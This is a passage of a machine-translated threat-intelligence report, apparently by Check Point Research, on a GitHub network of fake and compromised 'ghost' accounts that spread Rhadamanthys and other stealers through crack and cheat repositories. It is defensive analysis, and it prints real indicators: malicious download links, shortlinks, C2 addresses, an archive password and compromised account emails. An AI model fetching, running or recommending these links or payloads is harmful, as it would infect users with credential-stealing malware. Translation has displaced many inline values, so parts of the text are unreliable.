jzhou8881/Discord-Nitro-Alt-Generator-Free
jzhou8881/Driver-Booster-Pro-License-Key-Crack
jzhou8881/EFT-ESP-hack
jzhou8881/ESET-NOD32-Antivirus-Crack
jzhou8881/Earnings-on-CS2-trades-CS-Trading-helper-Buff163
jzhou8881/Fc-24-Hack-Free
jzhou8881/Filmora-License-Key-Crack-Download
jzhou8881/FiveM-Hacks-2024
jzhou8881/Fivem-Hack-undetected
jzhou8881/Fixing-Error-0x80004005-Unspecified
jzhou8881/Fixing-Error-0x80070002
jzhou8881/Fixing-Error-0x80070005-Access-Denied
jzhou8881/Fixing-Error-0x8007000E
jzhou8881/Fixing-Error-0x80070057-Invalid-Parameter
jzhou8881/Fixing-Error-0x80070424-Specified-Service
jzhou8881/Fixing-Error-0x80070570
jzhou8881/Fixing-Error-0x80072EE7
jzhou8881/Fixing-Error-0x8015DC12
jzhou8881/Fixing-Error-0x803F8001
jzhou8881/Fixing-Error-0x887A0005-DirectX
jzhou8881/Fixing-Error-0x887A0020
jzhou8881/Fixing-Error-0xC000007B
jzhou8881/Fixing-Error-0xC0000142
jzhou8881/Fixing-Error-0xc0000005
jzhou8881/Fixing-Error-0xc00000ba
jzhou8881/Fixing-Error-BEX
jzhou8881/Fixing-Error-d3dx9-43-dll
jzhou8881/Fixing-Error-kernelbase
jzhou8881/Fortnite-hack-version
jzhou8881/Free-Crypto-Trading-Bot-Download
lixvr/1inch-bot
lixvr/BitMEX-trading-bot
lixvr/KuCoin-trading-bot
lixvr/Sandbox-CryptoBot
lixvr/eTukTuk-CryptoBot
teenjay/Sound-Forge-crack
teenjay/Steam-account-autoregger-creation-of-maFile
teenjay/Sublime-Text-crack
teenjay/TFT-Unlocker-Tool-FUll
teenjay/TeamViewer-Latest-Crack-2024
teenjay/The-unifier-is-both-Video
teenjay/Toon-Boom-Harmony-Crack
teenjay/Top-Osu-Hacks-2024-Aim-Assist-Bots-and-More
teenjay/TradingView-scripts
teenjay/Uniswap-bot
teenjay/Unity-Pro-Cracks
teenjay/VLC-Media-Player-Crack
teenjay/Vape-V4-Crack-Kangaroo
teenjay/Youtube-365-Auto-upload-cheat-checker
teenjay/ZBrush-Crack
teenjay/xBLAST-auto-bot
teenjay/yescoin-bot-installation
yCodezao/Microsoft-Office-2024-Cracked-Version
yCodezao/Microsoft-Project-Crack
yCodezao/NZT-Poker-AI-Bot-17-Rooms-Cash-Fish-Monitor
yCodezao/Notcoin-crypto-bot
yCodezao/Parallels-Desktop-Crack
yCodezao/Path-Of-Exile-Hack
yCodezao/Pinnacle-Studio-Crack
yCodezao/PlayDoge-Auto-Farm-and-Bot-Setup
yCodezao/Pro-Tools-Crack
yCodezao/ProtonVPN-Free-Crack-2024
yCodezao/ReiBoot-Pro-Crack-Download-Free
yCodezao/Revit-Crack
yCodezao/Rhinoceros-Crack
yCodezao/RisePro-Stealer-HVNC-Crack
yCodezao/SEED-SEARCHER-Crypto-Checker-30-Wallets
yCodezao/Sandbox-CryptoBot
yCodezao/ShibaShootout-CryptoBot
yCodezao/Snapster-autobot
yCodezao/SolidWorks-crack
yCodezao/cs2-hvh
yCodezao/pixel-wallet-bot-free
ySunSh1ne/JetBrains-IntelliJ-IDEA-Crack
yessine-agrebi/AOMEI-Partition-Assistant-Cracked-Software我們觀察到指向惡意腳本的直接外部鏈接或重定向到另一個 GitHub 存儲庫版本的鏈接,但威脅行為者也使用了 和 等短鏈接。搜索前面提到的短鏈接域,我們得到了大約 400 個存儲庫。goo.subit.ly
圖 24 – 帶有“下載”和短鏈接的結果。
短的“下載”鏈接將受害者重定向到從 下載存檔文件。另一個短鏈接 , 也重定向了這個 URL, 使總共有 142 個倉庫分發了下面的 GO 下載器。maestrascreciendoenamor.com/Loader-Installers.zipgoo.su/rH3n
802CBDBB7C195DAD3F763C38F21900A9006DB3292FFFC723B3CF75C10D239EA9 Loader-Installers\\CFG.ini
B624949DF8B0E3A6153FDFB730A7C6F4990B6592EE0D922E1788433D276610F3 Loader-Installers\\DriverUP.dll
060DE3B4CF3056F24DE882B4408020CEE0510CB1FF0E5007C621BC98E5B4BDF3 Loader-Installers\\Loader Installer.exe下載器發出一個 GET 請求,該請求似乎是為了注冊機器人的 IP 地址并生成活動統計信息:。當我們訪問該鏈接時,我們看到一個俄語頁面,其中提到了啟動的下載器數量(干凈行動前的最后統計數據)。147.45.44.73:1445/bibika1337?reason=
俄語 | 英語 | 不 |
Запущено всего | 推出的總數 | 1123 |
Запущено за две недели | 兩周內推出 | 1061 |
Запущено за неделю | 一周內推出 | 621 |
Запущено за 2дня | 2天內推出 | 131 |
Запущено за день | 在一天內推出 | 44 |
在短短 2 周內,Rhadamanthys 在通過 Stargazers Ghost Network 分發時感染了 1050 多名受害者。
圖 25 – 廣告系列統計信息。
在另外兩個 GET 請求之后,受害者下載了兩個受密碼保護的檔案:
圖 26 – 多個受密碼保護的存檔存儲在這些目錄中。
圖 27 – 存儲了兩個檔案,最后一個來自 2024-06-09。
兩個檔案都使用相同的密碼 .yanabibika
圖 28 – 受密碼保護的存檔解壓縮。
938554DB472202C51069B3590820456EB37EC3680B555D1DE532623E01468D47 Tricky2\\withya_MrAnon.cmd
64A49FF6862B2C924280D5E906BC36168112C85D9ACC2EB778B72EA1D4C17895 Tricky\\prezi-desktop-6-26-0.exe檔案中的可執行文件是 Rhadamanthys 的 GO 加載器,它被注入到其 C&C 中,然后與其通信。C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe147.78.103.199:2529
Atlantida 活動和 Rhadamanthys 的 GitHub 倉庫大約是在同一時間創建的。最早的 Rhadamanthys 倉庫是在 上創建的。該網絡運營商為此次活動雇用了大約 120 個 GitHub 帳戶。2024-05-30T18:51:26Z
圖 29 – 每個操作的帳戶數。
另一個有趣的發現發生在我們進一步檢查提交和分叉賬戶時。在(不是錯別字,確實是 2021 年)上,創建了存儲庫 (),并在 2021 年 2 月至 8 月期間被其他 25 個賬戶分叉。On ,更新了現在包含分發 Rhadamanthys 的網絡釣魚鏈接的原始文件。25 個分叉倉庫中的兩個應用了從原始倉庫提交。選擇“感染”該特定存儲庫的原因是它是此帳戶擁有的最受歡迎的存儲庫。2021-02-11T02:41:40ZV-arc/Silverfish53041402+V-arc@users.noreply.github.com/71246462@qq.com2024-06-02T09:06:59ZV-arcREADME.md
圖 30 – 更新 2021-02-13T15:41:31Z 的上次提交。
V-arcGitHub 帳戶是在 上創建的,但在 上進行了更新。我們不確定究竟發生了哪種更新,但可能生成了新的 GPG 密鑰。正如預期的那樣,該帳戶還具有一個存儲庫,其模式是在 上創建的。對惡意存儲庫的初始提交可能是使用時區的 Web 界面進行的。大約在同一時間(以天為單位)的其余提交可能發生在 的本地環境中,而最后一個合法提交發生在 。雖然所有“初始”提交都發生在時區,但 2024 年的最后一次惡意提交發生在 。我們認為該存儲庫極不可能一開始是惡意的,而是在 3 年后才開始推送惡意軟件。可能,該帳戶已被盜用,然后被包含在 Stargazers Ghost Network 中。有了這些信息,我們將 ~1100 個帳戶/存儲庫視為對受損帳戶憑據/權限的測試。2019-07-18T09:42:29Z2024-05-31T11:14:43Z# V-arc1\n12024-06-08T19:03:31Z2021-02-11T02:41:40ZUTC+82021-02-11T02:44:59Z2021-02-11T06:25:26Z2021-02-13T15:41:31ZUTC+8UTC+3# {username}1\n1
根據活動統計,在分發 GO 下載器的惡意倉庫活動中,有 687 次發生在 2024 年 5 月 31 日,表明了活動的開始日期。
圖 31 – Rhadamanthys 活動,GitHub 帳戶活動。
被其余帳戶分叉的文件的作者:README.md
提交日期 | 提交作者 | 提交電子郵件 | 存儲庫所有者 | 沒有惡意倉庫 |
2024-05-29T20:55:01Z 格林威治標準時間+0 | 巴圖哈諾德布 | 104384818+batuhanodbs@users.noreply.github.com | 巴圖哈諾德布 | 1 |
2024-05-29T21:00:55Z 格林威治標準時間+0 | 香霍恩 | 75545632+HeangHorn@users.noreply.github.com | 香霍恩 | 1 |
2024-05-29T21:09:37Z 格林威治標準時間+0 | 德布蘭科拉斯卡雷斯 | 107002366+dblancolascarez@users.noreply.github.com | 德布蘭科拉斯卡雷斯 | 1 |
2024-05-29T21:15:46Z 格林威治標準時間+0 | Yessine-Agrebi | 59874615+yessine-agrebi@users.noreply.github.com | Yessine-Agrebi | 1 |
2024-05-30T11:59:15Z 格林威治標準時間+0 | SpacyXyt | 80075528+SpacyXyt@users.noreply.github.com | SpacyXyt | 2 |
2024-05-30T18:51:26Z 格林威治標準時間+0 | Essence-of-Slimez-37 | 120878149+Essence-Of-Slimez-37@users.noreply.github.com | Essence-of-Slimez-37 | 27 |
2024-05-30T19:40:27Z 格林威治標準時間+0 | 專業2000 | majormadobe@gmail.com | 專業2000 | 2 |
2024-05-31T13:48:49Z 格林威治標準時間+0 | 莫拉諾11 | 124221765+Molano11@users.noreply.github.com | 莫拉諾11 | 2 |
2024-05-31T15:21:05Z 格林威治標準時間+0 | 丹姆661 | dnsrm9787@gmail.com | 丹姆661 | 3 |
2024-05-31T21:50:08Z 格林威治標準時間+0 | 黑色VN05 | 62129353+blackvn05@users.noreply.github.com | 黑色VN05 | 1 |
2024-06-01T12:55:33Z 格林威治標準時間+0 | ySunSh1ne | 113144625+ySunSh1ne@users.noreply.github.com | ySunSh1ne | 1 |
2024-06-01T12:56:02Z 格林威治標準時間+0 | AmerHashima(阿梅爾羽島酒店) | 43539190+AmerHashima@users.noreply.github.com | AmerHashima(阿梅爾羽島酒店) | 1 |
2024-06-01T12:56:45Z 格林威治標準時間+0 | 吉格普里馬基 | 93926139+jgprimaki@users.noreply.github.com | 吉格普里馬基 | 1 |
2024-06-02T09:06:59Z 格林威治標準時間+3 | V型弧 | 53041402+V-arc@users.noreply.github.com | V型弧 | 1 |
比較這兩個活動,盡管兩者都由相同的帳戶“加星標”和“分叉”,但鏈接和作案手法的差異使我們相信 Stargazers Ghost Network 的功能是惡意軟件/鏈接分發即服務 (DaaS)。在這種模型中,威脅行為者可能以不同的價格分享他們的惡意鏈接或惡意軟件,并通過這些惡意 GitHub 存儲庫分發它們,并由 Stargazer 帳戶“合法化”。Check Point Research 正在追蹤此服務背后的威脅行為者/團體,即 Stargazer Goblin。該組織提供、運營和維護 Stargazers Ghost Network,該網絡通過其 Ghost GitHub 帳戶分發惡意鏈接或惡意軟件。
通過網絡分發的惡意軟件家族包括:
自 2024 年 6 月初以來,我們觀察到 211 個仍然活躍的獨特倉庫在推送惡意鏈接,而 5 月份有 135 個活躍倉庫。自 2024 年 5 月以來,GitHub 已關閉大約 1559 個倉庫及其相關的 GitHub 帳戶。
圖 32 – 每個上次更新日期的活動存儲庫。
從我們一直跟蹤的賬戶來看,有 8 個不同的賬戶為倉庫授予了 530 顆星。雖然由于舊的倉庫已被刪除,我們無法訪問所有帶星標的倉庫,但它們都在同一天左右更新:2024-05-31T19:00:32Z
@Pids134, @rego321, @Molano11, @nepalhack, @PeeKhaye, @Ozgur010101, @posyshp, @ProfessorAMi雖然我們提到的帳戶都無法為我們提供有關網絡創建時間的信息,但有一個帳戶的名稱表明了其作為網絡一部分的目的。,具有 253 個帶星標的倉庫,創建于 。這是創建日期,但該網絡可能正在開發中,或者在此期間已經以較小的規模運行。@StarGhostSG2022-08-31T00:05:25Z
在搜索暗網論壇時,我們發現了 2023 年 7 月 8 日的廣告,宣傳所描述的網絡。廣告橫幅用英文和俄文寫成。根據該帖子,該帳戶提供加星標、關注、分叉和監視 GitHub 帳戶和存儲庫的服務,以及在 GitHub 上完成任何其他請求的操作。
圖 33 – 第一個廣告是在 2023-07-08。
價格根據所提供的服務而有所不同。例如,為具有 100 個帳戶的存儲庫加星標的費用為 10 美元,每美元獲得 10 顆星的費率。為受信任的帳戶提供“老化”存儲庫的費用為 2 美元。購買超過 500 美元可享受折扣。
圖 34 – 服務詳細信息和價格。
根據這些信息以及 2024 年 5 月中旬至 6 月中旬發生的存儲庫和操作的數量,Check Point Research 計算出 Stargazer Goblin 的潛在利潤約為 8,000 美元。我們認為,在這段時間內發生了更多的操作和存儲庫,使計算出的利潤只是實際利潤的一小部分。考慮到 Stargazers Ghost Network 自 2023 年 7 月起公開運營,并且可能自 2022 年 8 月以來規模較小,我們估計 Stargazers Ghost Network 整個生命周期的總利潤約為 100,000 美元。GitHub 可能會對利潤做出更準確的估計,因為他們對被禁止的帳戶和倉庫上發生的操作有更深入的了解。
Check Point Research 基于情報認為,GitHub Ghost 賬戶很可能只是全局的一部分,其他 Ghost 賬戶在不同的平臺上運營,是更大的 Distribution as a Service 宇宙的一個組成部分。當我們發現一個 GitHub 倉庫共享指向未列出的 YouTube 視頻的鏈接時,這一理論得到了支持。該視頻指導潛在受害者如何下載和安裝所謂的“免費”版本的 Adobe Photoshop。
圖 35 – 帶有下載和 YouTube 鏈接的 GitHub 帳戶。
在 YouTube 視頻中,可以看到威脅行為者從中下載受密碼保護的檔案,使用密碼提取它,然后繼續執行安裝程序 (Lumma Stealer)。在仔細檢查視頻的過程中,我們確定了文件夾的完整路徑。clouds-folder[.]com2424distC:\Users\Peresvet\DevelNextProjects\test\build\dist
圖 36 – 幽靈 YouTube 帳戶和惡意不公開視頻。
YouTube Ghost 帳戶也對自己的視頻發表評論。此外,我們觀察到被入侵的 GitHub 帳戶的實際所有者,回復了 Ghost 的一條評論。這種交互驗證了我們之前的假設,即 Stargazers Ghost Network 中的許多帳戶都已遭到入侵。@ANGEOM21
圖 37 – YouTube Ghost 帳戶的視頻評論部分。
我們相信 Stargazer Goblin 創建了一個由 Ghost 帳戶組成的宇宙,這些帳戶在 GitHub、Twitter、YouTube、Discord、Instagram、Facebook 等各種平臺上運行。這進一步讓我們相信,專門針對社交媒體導向用戶的 Atlantida Stealer 活動可能是由 Stargazer Goblin 執行的,以獲取 Ghost 網絡的帳戶。與 GitHub 類似,其他平臺可用于使惡意網絡釣魚合法化,并通過帖子、存儲庫、視頻、推文和頻道向受害者分發鏈接和惡意軟件,具體取決于每個平臺提供的功能。
未來的 Ghost 帳戶可能會利用人工智能 (AI) 模型來生成更有針對性和多樣化的內容,從文本到圖像和視頻。通過考慮目標用戶的回復,這些人工智能驅動的帳戶不僅可以通過標準化模板推廣網絡釣魚材料,還可以通過根據真實用戶的需求和互動量身定制的定制回復來推廣網絡釣魚材料。惡意軟件分發的新時代已經到來,我們預計這些類型的操作將更頻繁地發生,從而越來越難以區分合法內容和惡意材料。
Stargazer Goblin 創建了一個極其復雜的惡意軟件分發操作,該操作可以避免檢測,因為 GitHub 被認為是合法網站,繞過了對惡意活動的懷疑,并在 GitHub 破壞其網絡時最大限度地減少和恢復任何損害。利用多個帳戶和配置文件執行不同的活動,從加星到托管存儲庫、提交網絡釣魚模板和托管惡意發布,使 Stargazers Ghost Network 能夠在 GitHub 執行任何干擾其操作時最大限度地減少損失,因為通常只有整個操作的一部分被中斷,而不是所有涉及的帳戶。
Stargazers Ghost Network 執行的活動和通過此服務分發的惡意軟件非常成功。在很短的時間內,數以千計的受害者從看似合法的存儲庫中安裝了軟件,而沒有懷疑任何惡意意圖。嚴重面向受害者的網絡釣魚模板允許威脅行為者通過特定的個人資料和在線帳戶感染受害者,使感染更有價值。
由于網絡在不斷發展,執行各種網絡操作的帳戶的實際數量尚不清楚。我們的最新計算表明,有超過 3,000 個 Ghost 賬戶。考慮到一個大約有 30 個倉庫的活動,使用大約 380 個 Ghost 賬戶,總數可能更高。雖然 GitHub 在許多情況下確實禁止可疑帳戶,但在采取這些措施之前,這些操作會長時間不間斷地運行。
一些 Ghost 帳戶似乎是由操作員創建的,而其他帳戶似乎是“正常”GitHub 帳戶遭到入侵。這使得 GitHub 憑證在地下市場中很有價值,因為該網絡也包含此類帳戶。將受感染的帳戶添加到網絡中使得估計 Stargazer Goblin 何時開始他們的惡意活動變得具有挑戰性。由于很難輕松地將明顯的惡意活動與普通用戶的惡意活動區分開來。然而,根據一些核心賬戶,我們認為 2022 年 8 月是網絡開發開始和/或規模較小的時候。Stargazers Ghost Network 的第一次公開廣告發生在次年,即 2023 年 7 月 8 日。Stargazer Goblin 的總估計利潤為 100,000 美元。
我們正在進入一個惡意軟件分發的新時代,幽靈賬戶在各種平臺上有機地推廣和分發惡意鏈接。未來由人工智能驅動的幽靈賬戶可能會發起更有針對性的活動,使得區分合法內容和惡意內容變得越來越困難。
GitHub 長期以來一直被用于惡意活動,盡管在攻擊中引入此網絡使得普通用戶很難檢測到可疑存儲庫。為了降低受此類威脅影響的風險,必須:
Check Point Threat Emulation 和 Harmony Endpoint 全面涵蓋攻擊策略、文件類型和操作系統,并保護其客戶免受本報告中描述的此類攻擊和惡意軟件系列的侵害。